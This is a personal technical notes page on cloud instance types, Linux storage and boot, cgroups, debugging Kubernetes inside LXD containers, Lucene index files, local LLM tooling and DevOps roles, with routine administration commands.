| General Purpose | M (Main / Balanced) | A balanced mix of CPU, memory, and network | Most applications, web servers, microservices |
| Compute Optimized | C (Compute) | High CPU power relative to memory (RAM) | Batch processing, media transcoding, game servers |
| Memory Optimized | R (RAM) | A large amount of memory relative to CPU | Databases (RDS), in-memory caches (ElastiCache) |
| Storage Optimized | I / D (I/O, Dense) | Extremely high-speed local disk I/O | NoSQL databases, search engines (Elasticsearch) |
| Accelerated Computing | G / P (Graphics / Parallel) | Hardware accelerators (GPUs) | AI/Machine Learning, 3D rendering |

Common Additional capabilities

| Capability Letter | Meaning (Processor or Feature) |
| --- | --- |
| g | Graviton (AWS's custom ARM processors) |
| a | AMD processors |
| i | Intel processors (often omitted if default) |
| d | Local NVMe storage (fast "instance store" drives) |
| n | Network optimized (higher network bandwidth) |
| z | High frequency (very fast single-core CPU) |

Linux

Storage

SSDs

Types of SSDs:

  • Form Factors:
    • 2.5" : looks like an HDD, slower, only supports SATA.
    • M.2: They come in few standard lengths (60mm, 80mm, 110mm), they support two interfaces:
      • SATA
      • PCIe (with and without NVMe support)
    • Add-in Card (AIC): Bigger than M.2 and operates over PCIe.
    • mSATA: looks like M.2, very small
    • U.2: Looks like 2.5" but way faster. They are mainly used in the enterprise (data centers)

NVME (Non-Volatile Memory Express):

  • is a super fast way to access SSDs and flash memory (NVM)
  • NVMe is not an interface and not a form factor (like SATA or PCIe) but a data transfer protocol
  • SSDs used SATA -> PCIe (lack of standard and features) -> NVMe

Lots of videos at the bottom of the page

PCIe

  • Each PCIe interface can be configured with 1 lane or multiple lanes (x4, x8, x16 and x32).
  • Each PCIe Generation doubles the bandwidth
  • PCIe is backward compatible (The interface and card settle on the lower version)
  • PCIe cards can be plugged in slots with different number of lanes with the consequence of having less bandwidth or wasted lanes.

Hard disk drive interface

  • PATA(IDE) - SCSI: Old interfaces
  • SATA: Personal HDD, successor of PATA
  • SAS: Enterprise HDD, successor of SCSI
  • More and More

Disks and Partitions

partitioning formats

There are 2 known partitioning formats:

  • MBR: disk size is limited to 2TB; can only create 4 primary partitions, the last of which can be set to an extended partition in which we can create logical partitions.
  • GPT: no disk size limit, no limit on partition size. The partition table information is available in multiple locations to guard against corruption. GPT can also write a “protective MBR” which tells MBR-only tools that the disk is being used.
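
Creating a GPT label and a partition with parted, as a sketch (/dev/sdX is a placeholder; this is destructive):

parted /dev/sdX mklabel gpt
parted /dev/sdX mkpart primary ext4 1MiB 100%
parted /dev/sdX print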

/dev/sd* vs /dev/disk:

  • The Linux kernel decides which device gets which name (/dev devices) on each boot, which can lead to confusion and unwanted behavior.
  • /dev/disk has many subdirectories that point to the partitions using identifiers other than the device name (by-label, by-id, by-uuid, by-path ...).
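
Listing the stable names and checking which devices they point to:

ls -l /dev/disk/by-id /dev/disk/by-uuid /dev/disk/by-label /dev/disk/by-path
blkid    # show UUIDs and labels per partition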

Boot

BIOS

The BIOS in modern PCs initializes and tests the system hardware components (Power-on self-test), and loads a boot loader from a mass storage device which then initializes a kernel. In the era of DOS, the BIOS provided BIOS interrupt calls for the keyboard, display, storage, and other input/output (I/O) devices that standardized an interface to application programs and the operating system. More recent operating systems do not use the BIOS interrupt calls after startup.

Boot Sequence

  • System switched on, the power-on self-test (POST) is executed.
  • After POST, BIOS initializes the hardware required for booting (disk, keyboard controllers etc.).
  • BIOS launches the first 440 bytes (the Master Boot Record bootstrap code area) of the first disk in the BIOS disk order.
  • The boot loader's first stage in the MBR boot code then launches its second stage code (if any) from either:
    • Next disk sectors after the MBR, i.e. the so called post-MBR gap (only on a MBR partition table),
    • A partition's or a partitionless disk's volume boot record (VBR),
    • For GRUB on a GPT partitioned disk—a GRUB-specific BIOS boot partition (it is used in place of the post-MBR gap that does not exist in GPT).
  • The actual boot loader is launched.
  • The boot loader then loads an operating system by either chain-loading or directly loading the operating system kernel.

UEFI

UEFI launches EFI applications, e.g. boot loaders, boot managers, UEFI shell, etc. These applications are usually stored as files in the EFI system partition. Each vendor can store its files in the EFI system partition under the /EFI/vendor_name directory. The applications can be launched by adding a boot entry to the NVRAM or from the UEFI shell.

Boot Sequence

  • System switched on, the power-on self-test (POST) is executed.
  • After POST, UEFI initializes the hardware required for booting (disk, keyboard controllers etc.).
  • Firmware reads the boot entries in the NVRAM to determine which EFI application to launch and from where (e.g. from which disk and partition).
  • A boot entry could simply be a disk. In this case the firmware looks for an EFI system partition on that disk and tries to find an EFI application in the fallback boot path \EFI\BOOT\BOOTx64.EFI (BOOTIA32.EFI on systems with an IA32 (32-bit) UEFI). This is how UEFI bootable removable media work.
  • Firmware launches the EFI application.
    • This could be a boot loader or the Arch kernel itself using EFISTUB.
    • It could be some other EFI application such as the UEFI shell or a boot manager like systemd-boot or rEFInd.
  • If Secure Boot is enabled, the boot process will verify authenticity of the EFI binary by signature.
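
Boot entries in NVRAM can be inspected and created with efibootmgr, roughly like this (disk, partition and loader path are examples):

efibootmgr -v                                   # list current NVRAM boot entries
efibootmgr --create --disk /dev/sda --part 1 \
  --label "Linux" --loader '\EFI\Linux\grubx64.efi'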

Containers

Cgroups

Privileged access to Cgroups

CGroups can be accessed with various tools:

  • Systemd directives to set limits for services and slices.
  • Through the cgroup FS.
  • Through libcgroup binaries like cgcreate, cgexec and cgclassify.
  • The Rules engine daemon to automatically move certain users/groups/commands to groups (/etc/cgrules.conf and cgconfig.service).
  • Through other software like LXC.
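
For instance, the systemd and libcgroup paths look roughly like this (the unit name, limits and the /demo group are examples):

# systemd: set limits on an existing service
systemctl set-property myservice.service MemoryMax=512M CPUQuota=50%

# libcgroup: create a group and run a command inside it
cgcreate -g memory,cpu:/demo
cgexec -g memory,cpu:/demo some-command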

Unprivileged access to Cgroups

Unprivileged users can divide resources using cgroups v2. The memory and pids controllers are supported out of the box; cpu and io require delegation.

  • To delegate cgroup resources we should add the Delegate systemd property, and reboot
# /etc/systemd/system/user@1000.service.d/delegate.conf
[Service]
Delegate=cpu cpuset io
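
After a reboot, the delegated controllers show up in the user's cgroup subtree (uid 1000 here matches the drop-in above):

cat /sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/cgroup.controllers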

Experiment running Kubernetes in LXD

Try 1: Kubernetes storage support

Kubernetes filesystem support

The hardest issue with deploying Kubernetes on LXD/LXC containers is storage and filesystem support:

BTRFS

BTRFS does not work well with Kubernetes, due to cAdvisor not playing well with BTRFS.

ZFS

ZFS does not work well with LXC and Kubernetes either, since it has poor support for nested containers.

One workaround is creating subvolumes for the container runtime and formatting them as ext4.

Another workaround is to have a ZFS-enabled containerd on the host and make it accessible inside LXC.

There are other solutions, like using the Docker loopback plugin ...

Containerd and overlay inside LXC

When running containerd inside LXC, systemd is unable to execute modprobe overlay inside the container (the module is already loaded in the host kernel).

Containerd is already patched and modprobe errors are ignored.

Cgroups v2 support

Containerd (and runC) supports Cgroups v2 already

I enabled it using this

[plugins]
  [plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc]
    [plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc.options]
      SystemdCgroup = true

  [plugins.cri.containerd.default_runtime]
    runtime_type = "io.containerd.runc.v2"
    runtime_engine = ""
    runtime_root = ""

Try 2: Weird problem

I have a weird problem now: when setting up a cluster with kubeadm, the containers keep restarting until everything crashes. The same thing happens with MicroK8s.

A weirder situation is that K0s works fine!

Hypothesis

There is something related to container technologies that's preventing the containers from running properly.

  • In the case of Kubeadm, the kubernetes components run in containers (containerd in my case).
  • In the case of Microk8s, the components run on top of snapd (to be verified).

--> In this case there should be something preventing them (containers, snaps) from running properly.

To verify this I will do the following experiments

  • Run k3s in LXD, since it uses containerd to run the k8s components, it should fail
  • Install kubernetes the hard way, this way I'll install the components as processes not as containers. In this case Everything should work fine.

Edit: MicroK8s works fine; the problem was related to the DNS plugin, which was disabled for some reason (this is why MicroK8s reported a not-running status). After microk8s enable dns everything works fine.

Kubeadm downgrade

Downgraded kubeadm from 1.22.0 to 1.20.4 and everything seems to work fine!

Can be a version problem! Digging deeper and maybe getting some help from serverfault.

A new problem arose: kube-proxy won't start and fails with open /proc/sys/net/netfilter/nf_conntrack_max: permission denied

The solution was to set nf_conntrack_max in the host.

sudo sysctl net/netfilter/nf_conntrack_max=131072

Managed to upgrade from 1.20.4 to 1.21.4 to 1.22.1 and the cluster is running almost fine, until it isn't.

For 1.21.4 everything was fine while in 1.22.1 nothing works.

It started with some CrashLoopBackOffs and now everything is down.

When I restart the kubelet, the containers start to show up a minute later, and then enter the crash loop again.

My hypothesis is that this is a version issue; there is something wrong with v1.22, with my LXD setup, or both. To test that I am doing the following:

  • Testing v1.22 using k3s or some other distribution.
  • Testing v1.22 with k8s the hard way.

Also v1.22 supports swap so maybe the problem has something to do with swap. I'll check that too:

Asked at k8s.slack.com and the responses suggested that the etcd server is the reason why everything fails, and that from Kubernetes 1.21 to 1.22 etcd moved to 3.5.0.

The best and least time-consuming way is Kubernetes the hard way, since it will help me with other things as well, and since k8s distros haven't moved to 1.22 yet.

  • https://github.com/inercia/terraform-provider-kubeadm
  • Use Ansible + Terraform is better maybe

Try 3: New cluster

Going back to this project. This works on 1.31+ with a little bit of tweaking. It may work with previous versions, but I have not tested them. Initialized a cluster on 3 LXD container instances.

  • Created 3 LXD container instances using LXD terraform provider and cloud-init

It is weird that LXD cloud images for ubuntu/jammy do not come with sshd installed, so I had to install it manually.

  • Getting the annoying error 285 fs.go:595] Unable to get btrfs mountpoint IDs: stat failed on /dev/nvme0n1p3 with error: no such file or directory. Apparently it does not affect the cluster health. See above for more information about the issue.
  • After initializing the cluster, the kube-proxy pod enters a CrashLoop state. kubectl logs shows that the container was failing with:
conntrack.go:100] Set sysctl 'net/netfilter/nf_conntrack_max' to 131072
server.go:495] open /proc/sys/net/netfilter/nf_conntrack_max: permission denied

Apparently kube-proxy is trying to change the value of nf_conntrack_max even if it does not have the permission to do so. This is maybe related to the way LXC loads the kernel modules (Need to dig more on this).

root@k8s-node-0:~# sysctl -p
sysctl: setting key "net.netfilter.nf_conntrack_max": No such file or directory
sysctl: cannot stat /proc/sys/net/nf_conntrack_max: No such file or directory

The solution was to prevent kube-proxy from changing the nf_conntrack_max value by setting maxPerCore to 0 in the kube-proxy configMap. More
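
A sketch of the change (the field lives under conntrack in the KubeProxyConfiguration embedded in the configmap):

kubectl -n kube-system edit configmap kube-proxy            # set conntrack.maxPerCore: 0 in config.conf
kubectl -n kube-system rollout restart daemonset kube-proxy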

kubectl apply -f https://github.com/weaveworks/weave/releases/download/v2.8.1/weave-daemonset-k8s.yaml

References

ElasticSearch

Introduction to Lucene

Ingestion Process

  • Document Creation: User creates a Document object in memory. Data model: Map-like structure with Field objects (e.g., TextField for searchable text, StoredField for retrievable data). Stored in RAM as Java objects.
  • Analysis (Tokenization & Filtering): Tokenize (split into words), Normalize (lowercase, remove stopwords, stem words like "running" → "run").
  • Term Addition to Index: the terms are added to the in-memory index.
  • Segment Flushing: when the buffer fills, data is flushed to disk as a new immutable segment.
  • Commit & Merging: On commit, segments are merged (background) into larger ones for efficiency

Index Data model

Data model

ls -1 | cut -f2 -d. |sort | uniq
doc
dvd
dvm
fdm
fdt
fdx
fnm
lock
nvd
nvm
pos
segments_4
si
tim
tip
tmd

The most important files are tim, tip, doc and pos. The full model is the following:

  • Vocabulary:

    • .tim: Terms Dictionary with All unique terms (words)
    • .tip: Terms Index Pointer/index into .tim
    • .doc: Postings - Frequencies
    • .pos: Postings - Positions
  • Stored Fields (Original Document Storage)

    • .fdt: Field Data - Actual stored field values (like a database)
    • .fdx: Field Index - Pointers to data in .fdt
    • .fdm: Field Metadata - Compression info (Describes field types, analyzers, norms, etc.)
  • Doc Values (Column-oriented Storage)

    • .dvd: Doc Values Data - For sorting/faceting
    • .dvm: Doc Values Metadata
  • Norms (Field Length Normalization)

    • .nvd: Norms Data - Field length info for scoring
    • .nvm: Norms Metadata
  • Metadata Files

    • .fnm: Field Names - Maps field IDs to names.
    • .si: Segment Info - Segment metadata (doc count, codec, version, deleted docs, etc.).
    • .tmd: Term Vector Metadata - For term vector storage. (Extra info for .tim and .tip.)
    • segments_4: Master file listing all segments (Lists all segments, their versions, and commit metadata.)
    • write.lock: Write lock (prevents concurrent writes)

Example

  • The document
# Document
0, "Hello World", "Lucene stores documents efficiently"
1, "Apache Lucene", "Lucene uses segments to store data"
2, "Search Engines", "Elasticsearch is built on Lucene"
  • Metadata files
# .fnm
0: title (indexed=true, stored=true, hasTermVectors=false)
1: body (indexed=true, stored=false, hasNorms=true)

# .tmd: Term Metadata, stores extra metadata about terms (field-level summaries, term stats, checksums).
Field "title": 3 unique terms
Field "body": 6 unique terms
checksum: 0xA32F9C

# .si: Segment Info, describes the whole segment.
Segment name: _2
Lucene version: 9.0
Doc count: 3
Deleted docs: 0
Files: [_2.fdt, _2.fdx, _2.tim, _2.tip, ...]

# segments_4: Commit point, global file listing all segments that make up the index.
Segments:
  _2 (3 docs)
  _3 (7 docs)
  _4 (2 docs)
Generation: 4

# write.lock
hostname=localhost
processId=12345
  • Stored fields
# .fdt: Documents and their stored field 
Doc 0:
  title = "Hello World"
Doc 1:
  title = "Apache Lucene"
Doc 2:
  title = "Search Engines"

# .fdx: offsets for each Doc to help lucene to seek inside .fdt
Doc 0 offset: 0
Doc 1 offset: 34
Doc 2 offset: 71

# .fdm: metadata about how fields are stored and indexed
Field "title":
  type: text
  analyzer: standard
  norms: no
Field "body":
  type: text
  analyzer: standard
  norms: yes
  • Dictionary files
# .tim: Term dictionary for indexed fields
Term Dictionary:
  body: [
    "built" -> docFreq=1, totalTermFreq=1
    "data" -> docFreq=1, totalTermFreq=1
    "elasticsearch" -> docFreq=1, totalTermFreq=1
    "lucene" -> docFreq=2, totalTermFreq=2
    "segments" -> docFreq=1, totalTermFreq=1
    "stores" -> docFreq=1, totalTermFreq=1
  ]
  title: [
    "apache" -> docFreq=1
    "hello" -> docFreq=1
    "search" -> docFreq=1
  ]

# .tip: Pointers for terms in .tim file (for fast seek)
Pointers:
  "apache" → offset 0
  "lucene" → offset 128
  "search" → offset 192

# .doc: Postings (docIDs), lists which documents contain each term. 
Term: "lucene"
  → docIDs = [1, 2]
Term: "search"
  → docIDs = [2]
Term: "hello"
  → docIDs = [0]

# .pos: Positions, word positions within documents (for phrase queries, proximity).
Term: "lucene"
  Doc 1: positions [0]
  Doc 2: positions [4]
  • Doc values (Columnar values)
# .dvd columnar storage for sorting, faceting, analytics.
Field "popularity" (numeric doc values)
Doc 0: 10
Doc 1: 25
Doc 2: 5

# .dvm: contains metadata (like offsets, encodings).
Field count: 2
Field 0: popularity (numeric)
  offset: 0x00000010
  encoding: delta-compressed int
Field 1: category (sorted)
  offset: 0x00000100
  encoding: terms dictionary

  • Norms
# .nvd per-field normalization factors (used in scoring).
Field: body
Doc 0: norm=0.577
Doc 1: norm=0.707
Doc 2: norm=0.5

# .nvm: norms metadata.
Field count: 1
Field 0: body (norms)
  offset: 0x00000000
  encoding: byte
  numDocs: 3

Field Settings

Each field in a Lucene document has the following separate boolean settings:

  • indexed: The field is searchable (terms go into the inverted index).
  • stored: The field’s original value is saved so it can be retrieved with the document.
  • docValues: The field’s value is stored in columnar form for sorting, faceting, etc.

Norms

Norms are small numeric factors Lucene computes per field, per document to help with relevance scoring.

They typically encode things like:

  • How long the field is (shorter fields often get a boost),
  • Whether it contains many terms,
  • Field-level boosts applied at indexing time.

These are used when computing the TF-IDF or BM25 score that determines how relevant a document is to a query.

Doc values

Doc values are Lucene’s columnar data store — think of them like a per-field database column.

They’re designed for:

  • Sorting: e.g., sort search results by “price” or “date”
  • Faceting: e.g., count how many documents per “category”
  • Analytics: e.g., compute averages, histograms, or aggregations

Index operations

Deletions

Deletes are soft: each segment has a bitset with one bit per doc, and a doc's bit is set to 0 to mark it for deletion.

On segment merge, segments with more deleted docs are prioritized.

Updates

Updating a previously indexed document is a “cheap” delete followed by a re-insertion of the document. Updating a document is even more expensive than adding it in the first place. Thus, storing things like rapidly changing values in a Lucene index is probably not a good idea – there is no in-place update of values.

References

LLMs

Running LLMs

Timeline:

Inception

  • Sept 2022: Georgi Gerganov initiated the GGML (Georgi Gerganov Machine Learning) library as a C library implementing tensor algebra with strict memory management and multi-threading capabilities. This foundation would become crucial for efficient CPU-based inference.
  • Mar 2023: llama.cpp built on top of GGML with pure C/C++ with no dependencies. -> LLM execution on standard hardware without GPU requirements.
  • Jun 2023: Ollama Docker-like tool for AI models, simplifying the process of pulling, running, and managing local LLMs through familiar container-style commands. It became the easiest entry point for users wanting to experiment with local models.

Standardization

  • Aug 2023: GGUF format (GGML Universal Format) successor to GGML format. GGUF provided an extensible, future-proof format storing comprehensive model metadata and supporting significantly improved tokenization code.
  • 2024: Multiple tools
    • vLLM emerged as a high-throughput inference server optimized for serving multiple users
    • GPT4All developed into a comprehensive desktop application with over 250,000 monthly active users
    • LM Studio became a popular cross-platform desktop client for model management

The flow

image

Building the model

  • The model is built and trained using PyTorch, TensorFlow, JAX or another framework.
  • The framework outputs the model weights:
    • JAX/Flax: msgpack checkpoints (flax_model.msgpack) + config.json
    • Tf/Keras: SavedModel directory (saved_model.pb + variables/) or HDF5 file (model.h5)
    • PyTorch: .pt or .pth saved with torch.save(model.state_dict(), "model.pt")
    • ONNX (Open Neural Network Exchange): a cross-framework intermediate format used to transfer models; it has an ONNX Runtime which can run it
  • The models can be converted to Hugging Face model formats
    • pytorch_model.bin or model.safetensors → the weights (can be multiple shards if big).
    • config.json → architecture hyperparameters (hidden size, number of layers, etc.).
    • tokenizer.json, tokenizer.model, special_tokens_map.json, etc. → tokenizer files.
    • generation_config.json → default generation params.

model.safetensors is a safe, zero-copy serialization format for tensors. It is an alternative to PyTorch's pickle-based .bin (which can execute arbitrary code on load and is therefore unsafe), supports other frameworks like TF and JAX, is convertible to GGUF and other formats, and can be run by vLLM natively.

Running the models (vLLM vs llama.cpp)

  • vLLM: Runs the model in HF format (inference). It can start an inference server with an OpenAI-compatible API.
  • The model can be converted further (compiled into) to TensorRT which is NVIDIA’s inference optimization runtime (For all DL models). It takes a model in any format (PyTorch, ONNX) and compiles it into a TensorRT engine .plan file highly optimized for Nvidia GPUs. (This is used if we are targeting Nvidia GPUs)

vLLM doesn’t use TensorRT by default (it uses its own kernel tricks), but you could use TensorRT separately.

  • On Apple Silicon the model can be converted using MLX to use the unified memory. MLX optimizes the model for inference on Apple Silicon (quantization, for example).
  • Convert the model from HF format to GGUF format (quantization).
  • Run the GGUF on llama.cpp on CPU and low-resource hardware.
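
The HF -> GGUF -> llama.cpp path sketched as commands (script and binary names depend on the llama.cpp version; the model path and quantization type are examples):

python convert_hf_to_gguf.py ./my-hf-model --outfile model-f16.gguf
./llama-quantize model-f16.gguf model-q4_k_m.gguf Q4_K_M
./llama-cli -m model-q4_k_m.gguf -p "Hello"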

Running the models as a user

  • Create a Modelfile to package the model a la Dockerfile.
FROM ./model-q4_k_m.gguf
PARAMETER temperature 0.7
TEMPLATE """{{ .Prompt }}"""
  • Build the model ollama create mymodel -f Modelfile and run it ollama run mymodel.

  • We can push/pull the model.

  • While ollama is developer friendly/focused, there are other tools geared towards end users like gpt4all and LM studio (GUI first, marketplace, builtin chat ui ...)

  • Common AI Model Formats

Running Local LLMs

Prerequisites

  • CUDA: Application programming interface for Nvidia GPUs
  • AMD ROCm is an open software stack including drivers, development tools, and APIs that enable GPU programming from low-level kernel to end-user applications.
  • Intel oneAPI: Same, but with a different goal: trying to standardize computation over CPUs, GPUs, FPGAs ...

Inference Engines

image

Serving Frameworks

image

These are serving frameworks in the sense that they do the entire thing, including compression, deployment, serving, memory management, caching ... while the previous category only runs the model on the hardware (with some optimizations, but not a fully fledged framework).

  • LMDeploy: also a solution for running LLMs (inference).

Dev Oriented

  • Ollama: Uses docker like concepts to manage and run models
  • LocalAI:
    • It supports a lot of backends, including llama.cpp, vllm, and hf transformers ...
    • It supports hardware acceleration for various models.
    • It is arguably the most complete, but it feels cumbersome.
    • It supports a declarative way to define models.
    • It is container first. Run with container images | LocalAI
  • mozilla-ai/llamafile: single-executable-file models (it relies on llama.cpp)

Containers

  • Ramalama:
    • Supports multiple transports (ollama:// hf:// and oci:// and ModelScope://)
    • ramalama supports 3 runtimes: llama.cpp, vllm and mlx.
    • It starts a container image with everything needed to run the model including optimizations. On run ramalama detects the GPU information and decides which image to use.
  • Docker:
    • Same, but the AI models are not standard OCI images, which makes them not pullable from ramalama
    • Docker has introduced ability to run MCP servers.

GUIs

tools

DevOps Guide

DevOps engineering

"DevOps Engineer"" is a highly relative job title. Purists will tell you the term makes no sense because DevOps is a methodology, not a person. Yet, you will find thousands of job listings, each defining the role differently.

In many cases, these positions are simply rebranded Operations engineers or SysAdmin roles equipped with modern tooling. However, the actual scope of a DevOps Engineer varies widely and typically entails one or more of the following tasks:

  • Build: Core Infrastructure & Operations
    • Provisioning and maintaining resources, whether on-premise or in the cloud.
    • System Administration: Installing, patching, and maintaining OS-level components (Linux/Windows). This includes managing users, permissions, and filesystems.
    • Configuration Management: Automating the setup and maintenance of software configurations across servers.
    • Networking & Storage: Managing software-defined networking (VPCs, subnets) and storage volumes.
    • Operations Management: Handling routine maintenance, backups, and general system health.
    • Database Management: Basic provisioning, replication setup, and ensuring data persistence.
  • Design: Architecture & Design
    • System Design: Architecting solutions based on needs, e.g. choosing between loosely coupled (microservices) or tightly coupled (monoliths) structures.
    • High Availability & Scalability Strategy: Designing systems to withstand traffic spikes (auto-scaling) and regional failures (redundancy).
    • Cloud Architecture: Deciding which managed services (Serverless, Managed SQL, Object Storage) to use versus building from scratch.
  • Automate: Automation & Tooling
    • Automation: Replacing manual UI interactions with reproducible code.
    • Scripting & Middleware Development: Writing scripts to connect tools that don't natively talk to each other.
    • Infrastructure as Code (IaC): Defining the entire environment in configuration files rather than manual setup.
  • Release: Release Engineering & Software Supply Chain
    • Software Supply Chain Management: Managing dependencies, auditing libraries for safety, and generating Software Bill of Materials (SBOM).
    • Deployment Strategy (e.g., Weekly Deployment): Executing releases using strategies like "Blue/Green" swaps or "Canary" releases to limit the blast radius of errors.
    • Version Control Management: Enforcing branching strategies (e.g., GitFlow vs. Trunk-Based) to keep code organized.
    • Artifact Management: Securing compiled binaries and container images in private registries.
  • Operate: Reliability & Incident Management (SRE)
    • Monitoring & Observability: Setting up dashboards to track metrics (CPU, latency), logs (errors), and traces (user journey).
    • Incident Response: Acting as the first responder during outages to triage and coordinate fixes.
    • Post-Incident Review (Post-Mortems): Writing Root Cause Analysis (RCA) reports after incidents to prevent recurrence.
    • Chaos Engineering: Stress-testing systems by intentionally breaking components to ensure recovery automation works.
  • Help: Developer Experience (DevEx)
    • Developer Environment Building: Creating pre-configured environments (e.g., DevContainers) so new hires can code on Day 1 without setup friction.
    • Internal Developer Platform (IDP): Building self-service portals where developers can provision their own resources without blocking Ops.
    • Documentation & Knowledge Base: Maintaining runbooks and wikis to prevent "brain drain" when engineers leave.
  • Protect: Security & Governance (DevSecOps)
    • Security & Compliance: Ensuring infrastructure meets legal standards (GDPR, HIPAA, PCI-DSS) and internal policies.
    • Identity & Access Management (IAM): Enforcing "Least Privilege" to ensure developers don't have unnecessary "God mode" access to production.
    • Vulnerability Scanning: Automating security checks for both infrastructure (OS patches) and application code (libraries).
  • Collaborate: Culture & People
    • Team Support: Acting as a technical unblocker for development teams.
    • Coaching: Providing DevOps coaching to teams to instill cultural best practices.
    • FinOps: Monitoring cloud costs and guiding teams toward architecting cost-effective solutions.

Fundamentals

Networking

Storage